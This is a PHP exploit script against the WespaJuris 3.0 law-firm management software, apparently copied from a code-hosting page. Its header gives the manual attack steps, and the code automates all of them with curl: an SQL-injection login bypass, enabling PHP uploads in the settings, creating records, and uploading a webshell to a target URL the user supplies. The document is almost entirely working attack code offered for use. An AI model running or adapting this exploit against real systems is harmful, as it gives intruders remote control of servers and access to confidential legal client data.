248 lines
No EOL
8.6 KiB
PHP
248 lines
No EOL
8.6 KiB
PHP
<?php
|
|
/*
|
|
# Exploit Title: WespaJuris <= 3.0 auto exploit
|
|
# Date: 07th august 2012
|
|
# Exploit Author: WhiteCollarGroup
|
|
# Vendor Homepage: http://www.wespadigital.com.br/
|
|
# Software Link: http://www.wespadigital.com.br/download/wespajuris_v3_0_2012.rar
|
|
# Version: 3.0
|
|
# Tested on: Apache Server
|
|
|
|
WespaJuris is a software for law firms.
|
|
|
|
Use this exploit to upload a webshell on vulnerable applications.
|
|
Usage:
|
|
php exploit.php
|
|
|
|
Example
|
|
$ php exploit.php
|
|
WespaJuris <= 3.0 exploit
|
|
Coded by WhiteCollarGroup
|
|
Type Ctrl + C for exit
|
|
Try "php exploit.php /about" for get info
|
|
|
|
[?] Target address (login form):
|
|
http://localhost/juris/
|
|
[?] Webshell path (in your computer):
|
|
C:\wamp\www\webshell.php
|
|
[*] Login...
|
|
[*] Trying to add php on allowed file formats.
|
|
[*] Adding a new client.
|
|
[*] Getting new client ID
|
|
[!] Client ID: 30
|
|
[*] Adding a new process.
|
|
[*] Getting new process ID.
|
|
[!] New process ID: 37
|
|
[*] Adding new task.
|
|
[*] Getting new task ID
|
|
[*] New task ID: 16
|
|
[*] Adding new doc type.
|
|
[*] Trying to get new doc type ID.
|
|
[!] New doc type ID: 7
|
|
[*] Trying to upload file...
|
|
[*] Thinking about file address...
|
|
[!] Exploit complete.
|
|
[i] You have now a webshell in <http://localhost/juris/clientdir/30/dl/webshell.php>
|
|
|
|
Then, go to http://localhost/juris/clientdir/30/dl/webshell.php and see your webshell.
|
|
|
|
:: How this exploit works? Manually work.
|
|
|
|
~> Login bypass
|
|
On login form, enter "SQLi strings":
|
|
Login: ' or 1=1-- wc
|
|
Pass: wcgroup
|
|
|
|
~> Configure file formats
|
|
Go to "CONFIGURAÇÕES".
|
|
In "Extensões de documentos", add "php".
|
|
|
|
BEGIN Do it only if the system is blank
|
|
|
|
~> Add new client
|
|
Go to "CLIENTES E USUÁRIOS" > "adicionar".
|
|
Add your own user.
|
|
|
|
~> Add new process
|
|
Go to "PROCESSOS" > "adicionar".
|
|
Add your own process.
|
|
|
|
~> Add new task
|
|
Go to "PROCESSOS".
|
|
Click on the process that you've created.
|
|
In "Tarefas", click "Adicionar".
|
|
|
|
~> Add new document type
|
|
Go to "DOCUMENTOS".
|
|
Click "ADICIONAR/EDITAR TIPO DOCUMENTO".
|
|
In "Adicionar Tipo de Documento" form, type anything and then, click "Adicionar".
|
|
|
|
END Do it only if the system is blank
|
|
|
|
~> Get arbitrary file upload
|
|
Go to "DOCUMENTOS".
|
|
Click "ADICIONAR DOCUMENTO".
|
|
In "Título", select a client and a process. Click "PROSSEGUIR".
|
|
Select a task in "TAREFAS", a document type in "Escolha um Tipo".
|
|
In "Título do documento", type anything.
|
|
Upload file in "Subir arquivo do Documento". Leaves "Link para Documento na Internet" empty.
|
|
Click "Adicionar Novo Documento".
|
|
Click "DOCUMENTOS" and click on the your webshell.
|
|
|
|
*/
|
|
set_time_limit(0);
|
|
echo "WespaJuris <= 3.0 auto exploit\n";
|
|
echo "Coded by WhiteCollarGroup\n";
|
|
echo "Type Ctrl + C for exit\n";
|
|
|
|
if((isset($argv[1])) AND ($argv[1]=="/about")) {
|
|
echo "WhiteCollarGroup\nwww.wcgroup.host56.com\nwhitecollar_group@hotmail.com\nTwitter/Facebook/Blogspot: WCollarGroup\nirc.virtualife.com.br #wcgroup\n\n";
|
|
exit;
|
|
} else {
|
|
echo "Try \"php $argv[0] /about\" for get info\n";
|
|
}
|
|
echo "\n";
|
|
if(!function_exists("curl_init")) {
|
|
echo "PHP CURL was not found on this system.\n";
|
|
echo "Linux (Debian-like apt system): Type the following command on shell:\n";
|
|
echo "# apt-get install php5-curl\n\n";
|
|
echo "Unix: Edit your file php.ini and remove \";\" from following line:\n";
|
|
echo ";extension=curl.so\n\n";
|
|
echo "Windows: Edit your file php.ini and remove \";\" from following line:\n";
|
|
echo ";extension=php_curl.dll\n\n";
|
|
echo "Read more: http://www.php.net/manual/book.curl.php\n\n";
|
|
exit;
|
|
}
|
|
|
|
puts("Target address (login form):", "[?]");
|
|
$target = trim(fgets(STDIN));
|
|
|
|
$target = preg_replace("/index\.php$/", null, $target);
|
|
$target = preg_replace("/\/$/", null, $target);
|
|
|
|
puts("Webshell path (in your computer):", "[?]");
|
|
|
|
do {
|
|
$webshell = trim(fgets(STDIN));
|
|
if(!file_exists($webshell)) echo "File not found!";
|
|
} while(!file_exists($webshell));
|
|
|
|
$ch = curl_init();
|
|
|
|
|
|
// login
|
|
puts("Login...");
|
|
curl_setopt($ch, CURLOPT_URL, $target."/process_login.php");
|
|
curl_setopt($ch, CURLOPT_REFERER, $target);
|
|
curl_setopt($ch, CURLOPT_POST, 1);
|
|
curl_setopt($ch, CURLOPT_POSTFIELDS, "do=login&username=".urlencode("' or 1=1-- wc")."&password=wcgroup");
|
|
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
|
|
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
|
|
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
|
|
curl_setopt($ch, CURLOPT_COOKIEJAR, "wcgroup.txt");
|
|
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
|
$store = curl_exec($ch);
|
|
if(preg_match("/Dados de acesso incorretos, por favor tente novamente/", $store)) {
|
|
puts("Could not login.", "[-]");
|
|
echo "Make sure that the server uses a vulnerable version of WespaJuris.\n";
|
|
exit;
|
|
}
|
|
|
|
// config file format
|
|
$ext = end(explode(".", $webshell));
|
|
puts("Trying to add $ext on allowed file formats.");
|
|
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=settings");
|
|
curl_setopt($ch, CURLOPT_POSTFIELDS, "task=defsideset&new_serverdiff=0&new_dateformat=".urlencode("%Y/%c/%e")."&new_extensions=".urlencode("$ext,php,jpg,jpeg,gif,png,psd,zip,ai,pdf,doc"));
|
|
curl_exec($ch);
|
|
|
|
// add client
|
|
puts("Adding a new client.");
|
|
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=addclient");
|
|
curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addclient&company=WhiteCollarGroup&address1=www.wcgroup.host56.com&address2=whitecollar_group%40hotmail.com&city=%40WCollarGroup&state=facebook.com%2FWCollarGroup&zip=wcollargroup.blogspot.com&country=irc.virtualife.com.br+%23wcgroup&phone=WCGroup&phone_alt=This+was+a+auto+exploit&fax=We+did+not+hack+your+website");
|
|
curl_exec($ch);
|
|
|
|
// get user ID
|
|
puts("Getting new client ID");
|
|
curl_setopt($ch, CURLOPT_POST, 0);
|
|
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=addfiles");
|
|
$store = curl_exec($ch);
|
|
$numbers = array();
|
|
preg_match_all("/<option value=\"main\.php\?pg=addfiles&clid=(.*)\">WhiteCollarGroup<\/option>/", $store, $numbers);
|
|
$uid = $numbers[1][0];
|
|
puts("Client ID: $uid", "[!]");
|
|
|
|
// add process
|
|
puts("Adding a new process.");
|
|
curl_setopt($ch, CURLOPT_POST, 1);
|
|
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=addproj");
|
|
curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addproject&client_id=".$uid."&project_title=HackMySite&description=WCGroup+did+not+hacked+your+website.%0D%0AWCGroup+only+wrote+the+exploit+for+this+CMS+and+did+public+release.&startdate=08%2F06%2F2012&startdate_Month=7&miledate=08%2F06%2F2999&miledate_Month=7&findate=&findate_Month=&cost=0.00&status=Arquivado");
|
|
$store = curl_exec($ch);
|
|
|
|
// get process ID
|
|
puts("Getting new process ID.");
|
|
$numbers = array();
|
|
preg_match_all("/main\.php\?pg=projperms&pid=([0-9]*)/", $store, $numbers);
|
|
$pid = $numbers[1][0];
|
|
puts("New process ID: $pid", "[!]");
|
|
|
|
// add task
|
|
puts("Adding new task.");
|
|
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=addtask");
|
|
curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addtask&clid=$uid&pid=$pid&client_id=main.php%3Fpg%3Daddtask%26clid%3D$uid&pid=$pid&task_title=Hacked+site&description=Sorry%2C+admin.&startdate=08%2F06%2F2012&startdate_Month=7&miledate=08%2F06%2F2999&miledate_Month=7&findate=&findate_Month=&status=Em+andamento¬es=Check+www.wcgroup.host56.com+for+details&tuid=0");
|
|
$store = curl_exec($ch);
|
|
|
|
// get task id
|
|
puts("Getting new task ID");
|
|
curl_setopt($ch, CURLOPT_POST, 0);
|
|
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=proj&clid=$uid&pid=$pid");
|
|
$store = curl_exec($ch);
|
|
$numbers = array();
|
|
preg_match_all("/main\.php\?pg=edittask&clid=$uid&pid=$pid&tid=([0-9]*)/", $store, $numbers);
|
|
$taskid = $numbers[1][0];
|
|
puts("New task ID: $taskid");
|
|
|
|
// add doc type
|
|
puts("Adding new doc type.");
|
|
curl_setopt($ch, CURLOPT_POST, 1);
|
|
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=filetypes");
|
|
curl_setopt($ch, CURLOPT_POSTFIELDS, "task=addfiletype&file_type=hack");
|
|
curl_exec($ch);
|
|
|
|
// get doc type id
|
|
puts("Trying to get new doc type ID.");
|
|
curl_setopt($ch, CURLOPT_POST, 0);
|
|
curl_setopt($ch, CURLOPT_URL, $target."/admin/main.php?pg=filetypes");
|
|
$store = curl_exec($ch);
|
|
$numbers = array();
|
|
preg_match_all("/main\.php\?pg=filetypes&task=deltype&type_id=([0-9]*)/", $store, $numbers);
|
|
$tid = $numbers[1][0];
|
|
puts("New doc type ID: $tid", "[!]");
|
|
|
|
// upload file
|
|
puts("Trying to upload file...");
|
|
curl_setopt($ch, CURLOPT_POST, 1);
|
|
$post = array(
|
|
"task" => "addfile",
|
|
"client_id" => $uid,
|
|
"from" => "step1",
|
|
"project_id" => $pid,
|
|
"clid" => $uid,
|
|
"task_id" => $taskid,
|
|
"type_id" => $tid,
|
|
"file_title" => "wcgroup",
|
|
"file" => "@$webshell"
|
|
);
|
|
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
|
|
curl_exec($ch);
|
|
|
|
// make file address
|
|
puts("Thinking about file address...");
|
|
$fileaddr = $target."/clientdir/$uid/dl/".basename($webshell);
|
|
|
|
puts("Exploit complete.", "[!]");
|
|
puts("You have now a webshell in <$fileaddr>", "[i]");
|
|
|
|
function puts($str, $type=false) {
|
|
if(!$type) $type = "[*]";
|
|
echo $type." ".$str."\n";
|
|
} |